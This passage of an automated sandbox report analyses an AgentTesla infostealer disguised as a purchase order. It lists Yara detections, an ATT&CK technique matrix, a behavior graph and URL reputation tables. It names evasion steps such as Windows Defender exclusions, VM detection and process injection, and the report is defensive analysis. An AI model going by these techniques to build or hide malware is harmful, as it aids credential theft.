                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.487748726.000000000645C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 08042021New-PurchaseOrder.exe PID: 4952, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SWqTT.exe PID: 3064, type: MEMORY
                      Source: Yara matchFile source: 32.2.SWqTT.exe.64915d0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.08042021New-PurchaseOrder.exe.3543aa8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.SWqTT.exe.64915d0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.08042021New-PurchaseOrder.exe.3543aa8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.08042021New-PurchaseOrder.exe.35790c8.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.08042021New-PurchaseOrder.exe.35790c8.4.raw.unpack, type: UNPACKEDPE

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.487748726.000000000645C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 08042021New-PurchaseOrder.exe PID: 4952, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SWqTT.exe PID: 3064, type: MEMORY
                      Source: Yara matchFile source: 32.2.SWqTT.exe.64915d0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.08042021New-PurchaseOrder.exe.3543aa8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.SWqTT.exe.64915d0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.08042021New-PurchaseOrder.exe.3543aa8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.08042021New-PurchaseOrder.exe.35790c8.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.08042021New-PurchaseOrder.exe.35790c8.4.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Application Shimming1Exploitation for Privilege Escalation1Disable or Modify Tools11OS Credential DumpingFile and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Windows Service1Application Shimming1Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery114Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter1Registry Run Keys / Startup Folder1Access Token Manipulation1Obfuscated Files or Information2Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsService Execution2Logon Script (Mac)Windows Service1Timestomp1NTDSSecurity Software Discovery331Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptProcess Injection11Masquerading1LSA SecretsVirtualization/Sandbox Evasion251SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRegistry Run Keys / Startup Folder1Virtualization/Sandbox Evasion251Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection11Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 383917 Sample: 08042021New-PurchaseOrder.bat Startdate: 08/04/2021 Architecture: WINDOWS Score: 96 58 Found malware configuration 2->58 60 Multi AV Scanner detection for submitted file 2->60 62 Yara detected AgentTesla 2->62 64 Initial sample is a PE file and has a suspicious name 2->64 7 08042021New-PurchaseOrder.exe 21 7 2->7         started        12 SWqTT.exe 2->12         started        14 SWqTT.exe 2->14         started        process3 dnsIp4 52 myliverpoolnews.cf 172.67.150.212, 443, 49703, 49704 CLOUDFLARENETUS United States 7->52 54 192.168.2.1 unknown unknown 7->54 46 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 7->46 dropped 66 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->66 68 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 7->68 70 Adds a directory exclusion to Windows Defender 7->70 16 08042021New-PurchaseOrder.exe 7->16         started        20 cmd.exe 7->20         started        22 powershell.exe 23 7->22         started        28 3 other processes 7->28 48 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 12->48 dropped 72 Multi AV Scanner detection for dropped file 12->72 74 Hides threads from debuggers 12->74 24 AdvancedRun.exe 12->24         started        50 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 14->50 dropped 26 AdvancedRun.exe 14->26         started        file5 signatures6 process7 file8 42 C:\Users\user\AppData\Roaming\...\SWqTT.exe, PE32 16->42 dropped 44 C:\Users\user\...\SWqTT.exe:Zone.Identifier, ASCII 16->44 dropped 56 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->56 30 conhost.exe 20->30         started        32 timeout.exe 20->32         started        34 conhost.exe 22->34         started        36 AdvancedRun.exe 24->36         started        38 AdvancedRun.exe 28->38         started        40 conhost.exe 28->40         started        signatures9 process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      08042021New-PurchaseOrder.exe15%ReversingLabsByteCode-MSIL.Packed.Generic

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe15%ReversingLabsByteCode-MSIL.Packed.Generic

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
                      http://www.microsoft.co0%URL Reputationsafe
                      http://www.microsoft.co0%URL Reputationsafe
                      http://www.microsoft.co0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
                      https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
                      https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
                      https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
                      https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
                      https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
                      https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
                      https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
                      https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
                      https://reachplc.hub.loginradius.com&quot;0%Avira URL Cloudsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-12737166900%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-12737166900%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-12737166900%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-199458160%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-199458160%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-199458160%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      myliverpoolnews.cf
                      		172.67.150.212
                      		truefalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E349A863A698863617D7B55886FAE832.htmlfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5183A347C7BAD04E3424599E1B978F29.htmlfalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.microsoft.copowershell.exe, 00000008.00000003.391009899.0000000008E79000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://c.amazon-adsystem.com/aax2/apstag.js08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                          		high
                          https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-17166808042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
